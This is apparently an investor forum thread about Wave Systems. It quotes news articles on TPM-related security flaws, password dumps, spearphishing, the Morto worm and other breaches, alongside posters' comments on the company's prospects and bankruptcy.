“The convergence between IT and OT is where businesses are looking to drive some major efficiency gains in 2018, but it makes the challenge of knowing exactly what devices are on your network that much harder,” explained Myles Bray, vice president of EMEA at ForeScout. “IoT has expanded the attack surface considerably for all firms, and without basic security hygiene it is easy for bad actors to gain a foothold and then move laterally on a network to reach high-value assets and cause business disruption. With GDPR just around the corner businesses need to act now.”
New Attack Vector Shows Dangers of S3 Sleep Mode
https://www.darkreading.com/vulnerabilities---threats/new-attack-vector-shows-dangers-of-s3-sleep-mode/d/d-id/1331445?_mc=KJH-Twitter-2018-03
Researchers at Black Hat Asia demonstrated how they can compromise the security of a machine as it powers down and wakes up.
Two researchers at Black Hat Asia last month gave computers a reason to sleep with one eye open in their demo of "S3 Sleep," a new attack vector used to subvert the Intel Trusted eXecution Environment (TXT). A flaw in Intel TXT lets hackers compromise a machine as it wakes up.
Intel TXT is the hardware-based functionality that supports the dynamic root-of-trust measurement (DRTM) and validates the platform's trustworthiness during boot and launch. This attack targets trusted boot (tBoot), a reference implementation of Intel TXT normally used in server environments. tBoot is an open-source project that protects the virtual machine monitor (VMM) and operating system.
Senior security researcher Seunghun Han and security researcher Jun-Hyeok Park, both with the National Security Research Institute of South Korea, presented an exploit of the "Lost Pointer" vulnerability (CVE-2017-16837), a software flaw in tBoot. This specific attack vector has never been reported, the two said at Black Hat, and attackers only need root privilege to do it.
Researchers have investigated Intel TXT and tBoot before, the researchers explained. However, previous studies have only focused on the boot process. This one focuses on the sleeping and waking up sequence of tBoot, and how attackers could exploit a machine as it reactivates.
Securing the sleep states
Sure, you could avoid this kind of attack by keeping machines running constantly, so Han started their Black Hat session by pointing out the financial reasons for sleep mode. "Power consumption is cost," Han explained. "Many companies worry about power consumption for their products because lower power consumption means a lower electricity fee."
Shutting down machines dramatically reduces power consumption; however, reactivating all of their components poses a security risk. As the computer wakes up, restarting its many parts takes time and security devices might be temporarily shut down for part of the process.
PC, laptop, and server environments supporting advanced configuration and power interface (ACPI) have six sleeping states to gradually reduce power consumption as the machine shuts down. The states go from S0 to S5 as the CPU, devices, and RAM go into full sleep mode. Power to the CPU and devices is cut off at the S3 phase of sleep.
"Because of power-off, their states need to be restored and reinitialized for waking up," says Han. "If we intercept sleep and waking up, we can do something interesting."
There are boot protection mechanisms, Park says. The secure boot of the Unified Extensible Firmware Interface (UEFI) checks a cryptographic signature of the binary prior to execution, and stops it if the executable file lacks a valid signature. "Measured boot" measures a hash of the binary prior to execution and stores the measurement to the Trusted Platform Module (TPM).
TPM is a hardware security device widely deployed in commercial devices, Han says. It's designed with a random number generator, encryption functions, and Platform Configuration Registers (PCRs), which store hashes and can be used to seal data like Bitlocker, he explains.
The danger of sleep mode
When the system wakes up, it should turn on the security functions of the CPU and recover the PCRs of the TPM. However, because of the Lost Pointer flaw, tBoot doesn't measure all function pointers. Certain pointers in tBoot are not validated and can cause arbitrary code execution.
By exploiting the Lost Pointer flaw on a machine in S3 sleep mode, Han and Park found they can forge PCR values while a system sleeps and wakes up. If they can make the PCR variables whatever they want, attackers can subvert the Intel TXT security mechanism.
The researchers advise updating your tBoot to the latest version, or disabling the sleep feature in the BIOS, to protect against this kind of attack
Wave is dead maybe, but I'm moving to higher ground in the coming days.
Are the ex-employees dead or even the present employees?
1.4B stolen passwords are free for the taking: What we know now
https://www.csoonline.com/article/3266607/password-security/1-4b-stolen-passwords-are-free-for-the-taking-what-we-know-now.html
See #5
The 2012 LinkedIn password breach, and others like it, are still paying dividends for criminals
More than a billion plaintext passwords from third-party data breaches are freely available on the internet, and the human tendency to reuse passwords across multiple services means these credentials, some of them years old, remain a serious threat, especially for smaller organizations.
For years password dumps have been traded on criminal forums, but in the last six months the sheer volume of passwords has driven the price down, to the point that, in 2017, someone dumped a collection of 1.4 billion previously exposed credentials online — for free.
The credentials remain available at no charge to anyone who knows how to use a search engine and a torrent client, no need to bother with Tor.
"This has never happened before in history," J. Tate, co-founder of Bits & Digits, says. "People used to say, where do you find the breach data? On the dark net. Now here it is publicly; use it for what you want to use it for."
While researching this story, CSO uncovered in the breached data thousands of work email addresses and old passwords belonging to current and former employees of IDG (CSO's parent company), as well as IDG affiliates. CSO worked with IDG's IT departments to determine if the exposed passwords were accurate at the time of breach and to potentially identify incidents of password reuse.
The trove of data also includes email addresses and passwords for people working at all levels of government in countries around the world including police, military, and spies. Even users with @nsa.gov email accounts appear in these data dumps, although the National Security Agency (NSA) assured CSO that the agency is not affected by these exposed credentials. But, then, few organizations, if any, consume the volume or quality of threat intel that the NSA does.
The Department of Homeland Security and Department of Justice, both with email addresses and passwords in the dump, told CSO their agencies were unaffected, as did Bank of America and Wells Fargo. Likewise, Google and Apple said that the hundreds of millions of Gmail and iCloud email accounts in the dump were unaffected, since both companies proactively search for this kind of breach data and make their users change their passwords.
Small to medium-sized businesses, though, do not typically consume the same kind of threat intel as major banks or government agencies or large tech companies, even to do basic things like using a torrent client to download third-party breach data and cross-referencing against a list of current employees.
This leaves large swaths of businesses and local governments at risk of password reuse attacks — known as "credential stuffing" attacks — well within reach of unsophisticated attackers. Defending against these trivial yet devastating attacks begins with accepting the realities of human nature and recognizing that blaming employees or customers for reusing passwords is futile. Far better to appreciate that people are terrible at choosing and remembering strong passwords and go from there.
skip:
Defending against credential stuffing attacks
Here are five basic steps every organization should follow.
5. Make 2FA mandatory
The best and most important of all these recommendations, however, is to use two-factor authentication, preferably with a hardware token. Password reuse is worthless if a user has 2FA enabled, and a hardware token is more secure than an app on a user's phone. 2FA all the things.
SAM.gov hackers used spearphishing, spoofing, credential theft
Wave - two factor authentication could solve a lot of problems.
https://www.fedscoop.com/sam-gov-hackers-used-spearphishing-spoofing-credential-theft/
Cybercrooks who stole federal payments by hacking contractor accounts on a GSA website used sophisticated spearphishing techniques to steal login credentials and then diverted payments to bank accounts they controlled, an executive of a contractor targeted in the scam told FedScoop.
It’s unclear how much the scammers have netted through their scheme, which is being investigated by the GSA inspector general and federal law enforcement. The inspector general’s office declined to comment, but sources familiar with the investigation told FedScoop that the cyberattacks that facilitated the fraud had been identified last year and were ongoing as
recently as last week.
According to the executive, the spearphishing was enabled by shoddy security on the website itself, GSA’s System for Award Management, or SAM.gov, which didn’t provide two-factor authentication or use an email protocol designed to protect against incoming emails with spoofed domain names in their addresses. Targeting was also aided by the rich data the website provided.
The scammers “didn’t need to do any reconnaissance or research, the usual kind of social media engineering” to find out who at each company controlled the SAM.gov account, the executive said. “SAM.gov handed them the targeting intelligence they needed for the campaign.”
The public website has a search function that enables visitors to identify the point of contact for any company with an account on the site — which contractors can use to manage the payments they receive under federal contracts.
“It’s a spearphishing guide,” said the executive, who asked not to be identified because of the sensitive nature of the case. The emails sent to the points of contact “were very high quality,” said the executive, adding that they appeared to come directly from SAM.gov and contained a message asking recipients to click on a link to a fake login page. “It was a high quality facsimile of the real page,” the executive said. When the recipient entered their username and password, the page harvested them, then redirected the user to the real site, along with random login data.
“What you see next [after entering your information] is the real login page with the error message, so you think you’ve fat-fingered it,” explained the executive.
Having harvested the credentials for the account administrator, the hackers were able to login and use the site’s management functions to change the bank accounts into which federal payments were delivered.
Security experts say such attacks can be prevented by at least two baseline best practices that SAM.gov lacked:
? Two-factor authentication (2FA) — requiring the user to identify themselves via a secure hardware token or one-time passcode sent to their mobile phone, in addition to their password. But SAM.gov didn’t offer that option for account administrators, the executive said.
? DMARC, or Domain-based Message Authentication, Reporting and Conformance, is the industry standard measure to prevent email spoofing — when hackers make their messages appear as if they come from trusted correspondents. If DMARC had been deployed and enabled, spoofed emails purporting to come from SAM.gov would have been marked as spam or simply discarded. SAM.gov has a DMARC record, but enforcement has not been switched on.
A GSA spokeswoman declined to address specific questions about 2FA and DMARC. “This is an active law enforcement-sensitive investigation,” she said in an emailed statement. “GSA has made public as much information as it is able on our website and will continue to update accordingly.”
The executive from the targeted company was very critical of SAM.gov’s security. “It’s ridiculous how poorly put together that site is,” he said, adding that when the company first discovered the cyberattack, he struggled to find a point of contact at GSA to report it to.
“I couldn’t convince anyone to listen to me,” he said. After his initial contact with federal
investigators last year, “There was silence for months,” he said.
“Once they knew there was a problem, they had a responsibility to notify the site’s users… Everyone with an account should have been told to check whether their banking information had been changed … There are a thousand things they could have done.”
“The problem is not they had a problem, everyone has problems” concluded the executive. “The problem is the glacial speed with which they’ve responded.”
They've got your money and your data. Now hackers are coming to destroy your trust
Nation-state attackers are attempting to undermine trust in critical services -- so how do we go about stopping them?
http://www.zdnet.com/article/your-money-and-data-is-not-enough-as-hackers-take-aim-at-bigger-targets/?ftag=COS-05-10aaa0g&utm_campaign=trueAnthem:+Trending+Content&utm_content=5abd575804d30101340f557e&utm_medium=trueAnthem&utm_source=twitter
Shouldn't there be a system of having known devices and unknown devices thereby letting a company or government keep the unknown devices (the bad guys) off the network. Or a known device that shows itself in nefarious activities gets booted off the network. It would cut down on all the man power it takes to watch criminal activity (unknown devices). It could help by making an activated TPM the known device. Wave and/or ESW would help in this process by turning on these TPMs.
RSA conference with Intel and General Electric
#RSAC San Francisco. @TrustedComputin @intel @generalelectric security experts to talk #TPM to ensure manufactured devices are tamper-proof. https://t.co/tLIfsENv6o
— Trusted Computing (@TrustedComputin) March 28, 2018
Safend
How did the Wave trustee end up paying that other company over a million dollars in bankruptcy when Wave bought Safend for about 11 million in Wave stock a few years ago AND THEY RETAINED THE SAFEND TECH??
Is Rivetz borrowing pieces of Wave's technology?
They have quite a following on Twitter with new partners all the time. It would be a shame to see Wave reborn as a successful Rivetz.
Bankruptcy
Bankruptcy appears to be coming to a close in a couple of weeks. If Wave were somehow able to get a military contract or government contract then that could change. imo. Why Wave has been unable to get a follow through government contract after all these years seems a bit crazy especially with a military veteran like Bill Solms at the helm with his military hire(s).
New Windows worm spreads by attacking weak passwords
Admins spot 'Morto' worm after seeing jump in remote access connection attempts
By Gregg Keizer
August 29, 2011 12:10 PM ET
Computerworld - A new Windows worm is working its way through company networks by taking advantage of weak passwords, security researchers said over the weekend.
The worm, dubbed "Morto" by Microsoft and Helsinki-based F-Secure, has been circulating since at least last week, when company administrators noticed systems generating large numbers of unexplained connections to the Internet.
According to Microsoft, Morto is the culprit.
"Although the overall numbers of computers reporting detections are low in comparison to more established malware families, the traffic it generates is noticeable," said Hil Gradascevic, a researcher with the Microsoft Malware Protection Center (MMPC), in a Sunday blog.
Morto spreads using RDP, or Remote Desktop Protocol, the Microsoft-made protocol for controlling one computer by connecting to it from another.
All versions of Windows from XP on include client software that uses RDP to remotely access machines. The software, called Remote Desktop Connection (RDC) in XP, Vista and Windows 7, requires a username and password to log in to a remote system.
Windows PCs infected with Morto scan the local network for other machines that have RDC switched on, then try to log in to a Remote Desktop server using a pre-set list of common passwords, said F-Secure. If one of the passwords works, the worm then downloads additional malware components to the just-victimized server and kills security software to remain hidden.
The scanning for potential targets generates significant traffic on TCP port 3389, the port a Remote Desktop server monitors for incoming access requests.
That traffic caught the attention of puzzled network administrators starting last Thursday.
"Every 10 min. or so, a flood of TCP 3389 connection attempts out to seemingly random IP addresses," reported a user identified as "BarrySDCA" in a Friday message posted to a Microsoft support forum. "Our firewall is blocking it from getting out and it keeps trying."
That thread currently has nearly 70 messages and has been viewed by others almost 6,000 times, both large numbers for a discussion that started only days ago.
Analyses done by Microsoft and F-Secure identified the list of weak passwords the worm tries, which includes such too-easy examples as "password," "123456" and "abc123."
"This particular worm highlights the importance of setting strong system passwords," said Microsoft's Gradascevic. "The ability of attackers to exploit weak passwords shouldn't be underestimated."
Morto's purpose may be to crank out denial-of-service attacks against hacker-designated targets, said Microsoft in the write-up published Sunday.
Although Microsoft patched RDP just three weeks ago as part of August's monthly security update, Morto does not exploit that vulnerability, or any other in the protocol.
http://www.computerworld.com/s/article/9219555/New_Windows_worm_spreads_by_attacking_weak_passwords
Auditors: IRS plan compromises security for e-payment users
By Aliya Sternstein 08/19/2011
The Internal Revenue Service glossed over computer security in planning for a new tax return law that applies to e-payment processors, government investigators said. The law kicks in during the 2012 filing season for the 2011 tax year.
A tiny provision folded into the 2008 Housing and Economic Recovery Act stipulates that companies handling credit card transactions for merchants, such as PayPal, Amazon and traditional banks, must report the gross amounts of merchants' transactions along with the vendors' sensitive personal information starting in tax year 2011. The Treasury Department estimates that clamping down on sellers that are under-reporting sales, by comparing self-reported gross figures to the payment processors' numbers, will generate nearly $10 billion during the next 10 years.
But the law will add millions of additional reporting documents to IRS computer systems, according to federal auditors. And the agency's strategy for applying the law "does not consider the security of the computer systems being planned and changed or the new data being received," Michael R. Phillips, the Treasury Inspector General for Tax Administration's deputy IG for audit wrote in a July 26 report released Thursday.
The new provision will require that the IRS store the names, addresses and taxpayer identification numbers, or TINs, of the sellers that each third-party processor submits. Only merchants that amassed more than $20,000 in payments from more than 200 transactions in a single year are subject to the new rule. Small vendors often use their Social Security numbers as their TINs, so the reporting could put them at greater risk of identity theft, say some privacy groups, such as the Center for Democracy and Technology.
"CDT continues to have concerns about government requiring private entities, in this case payment systems, to collect and keep more sensitive personal information than they would otherwise need," David Sohn, senior policy counsel for the center, said on Friday. "Data breaches continue to be an unfortunate fact of life, so forcing companies to hold on to sensitive data to assist the government in tracking user behavior carries real risk."
The security policy lapse follows repeated criticisms from TIGTA and the Government Accountability Office during the past few years about glitches in IRS computers. Most recently, the inspector general issued a report in late June that stated software housing taxpayer information had not received the latest bug fixes, and the agency was not running appropriate vulnerability scans on all databases. GAO revealed in March 2010 that the IRS did not consistently use strong passwords, restrict access only to personnel whose jobs required logging on to systems, or keep track of breaches.
"In light of issues related to system security previously reported by the GAO, we expected the IRS to have more detail of the security considerations in its plan," Phillips wrote.
On Friday, a TIGTA spokesman said the IRS has since informed auditors that, after the review, the agency added particulars on computer security to its rollout plan. "TIGTA has not performed a follow-up review of the implementation plan to confirm the IRS' statements that details on computer security had been added," the spokesman said.
IRS spokesman Eric Smith on Friday was unable to comment on whether there has been an addendum.
During their audit, inspectors also discovered that a risk assessment of the new reporting program makes no mention of security reviews. "Sensitive taxpayer data could be at risk of disclosure," the report stated. "We believe that because of the significant risk associated with transmitting and storing large amounts of sensitive data, the effect if the data are compromised, and [given] the fact that the IRS has been criticized in the past for security weaknesses, the IRS should have specifically addressed this issue in its risk assessment to ensure all necessary steps were taken and contingency plans were developed as necessary."
The safety of consumers' personal information is not at issue because the payment processors will not be reporting individual buyer transactions to the IRS.
Faris Fink, IRS commissioner for the small business/self-employed division, responded to draft IG findings with a June 8 memo, saying security controls mandated by the 2002 Federal Information Security Management Act are required to be in place to ensure the protection of sensitive data. "These controls are tested and any risks are identified along with mitigations prior to system production," he wrote.
On Friday, Smith said the IRS does not discuss specifics about the agency's information safeguards, but "security is a cornerstone of our operations involving sensitive data, and we follow FISMA security protocols."
http://www.nextgov.com/nextgov/ng_20110819_2747.php?oref=topnews
Anonymous hacks defense contractor: Email data, 'schematics' stolen
By Zack Whittaker | August 19, 2011, 8:37am PDT
Summary: Anonymous hackers have released another large cache of data, this time belonging to a senior vice-president of a defense contractor, with links to the FBI.
Hacktivist group Anonymous has infiltrated and downloaded sensitive email messages of a major U.S. government defense contractor.
The email data, purportedly belonging to Richard Garcia, senior vice president at Vanguard and former FBI agent, belongs to Vanguard Defense, a military contractor, which makes unmanned drones for the field.
The documents are publicised in a post on Pastebin, which links to the leaked cache of documents and data on another site.
The hack is said to have occurred by exploiting weaknesses in the Wordpress blogging system, through two out-dated plug-ins.
Part of the wider AntiSec movement — devoted to releasing data held by high-profile targets lacking appropriate security — this comes as another blow to the U.S. law enforcement capability, only a fortnight after AntiSec hackers released the largest cache of law enforcement data to date.
The Anonymous group in a statement says the leak contains: “internal meeting notes and contracts, schematics, non-disclosure agreements, personal information about other VDI employees, and several dozen “counter-terrorism” documents classified as “law enforcement sensitive” and “for official use only.”
It is not clear whether the ’schematics’ stolen relate to the drones manufactured by Vanguard Industries or not. The email data, however, are marked as classified material, with “confidential” and “for official use only” markings.
The hackers did not point to a reason why Vanguard Industries was targeted, except crediting the hack as part of the ongoing “F**k FBI Friday” campaign.
“We are doing this not only to cause embarrassment and disruption to Vanguard Defense Industries, but to send a strong message to the hacker community. White hat sellouts, law enforcement collaborators, and military contractors beware: we’re coming for your mail spools, bash history files, and confidential documents”, reads the Pastebin-posted statement.
Another key message in the statement points to InfraGard, which the message calls a “sinister alliance of law enforcement, military and private security contractors” which protect infrastructure that “[Anonymous] aim to destroy.”
http://www.zdnet.com/blog/btl/anonymous-hacks-defense-contractor-email-data-schematics-stolen/55494
Waveduke - You have to be careful with phrases like 'in the not too distant future'. I think SKS has a TM on the phrase and that too could mean 'anytime' in the future. I like every Wavoid out their is hoping for the best. Thanks for your insights and humor. I'm working through this WIRBRS.
Waveduke, there is no doubt about the great benefits of this technology and as you pointed out the key locations that Wave has put itself in. If the technology is so great then why is it taking so long and I know we have just really reached a point of market saturation with TPM's. The runway seems to get longer and longer and I think that is why the WIRBRS virus hit me all of a sudden. BASF was back in April. Wave has announced nothing of significance and BP is end of 3rd quarter maybe 4th with north of 2 million. Sprague said they were working with 6 to 10 large companies LAST YEAR and we have seen partial GM and BASF. Now Wave is working with 10 to 20 large companies? What happened to the 6 to 10???? What keeps every Wavoid hanging on is maybe they are virtually on the cusp and I've waited this long so what's alittle while longer.
Long and waiting. I have a question for you. When are we going to get a real surprise conference call? I haven't seen one in 40 quarters, maybe my expectations are too high or the previous CC helps set those expectations. I'm working this WIRBRS out of my system today. I wonder if anybody noticed...
Waveduke - thanks for the laugh. It would just be nice to see (besides the cc) something from Lee. Its been so quiet. Those 6 to 10 co's were about a year ago. Anyways 10 years plus and still hanging in there. I bet I'm not the only one with WIRBRS. Again, thanks for the laugh.
Genz2
Past CC's
Do you ever notice how all the analysts say good quarter SKS before they ask him a question? It would be nice if an analyst said lousy quarter Steven, why aren't you profitable? The reason I say this is because it seems like its become acceptable to not be profitable. We're thanking SKS for another non-profitable quarter. Isn't that what one of the chief aims of a corporation is to be profitable?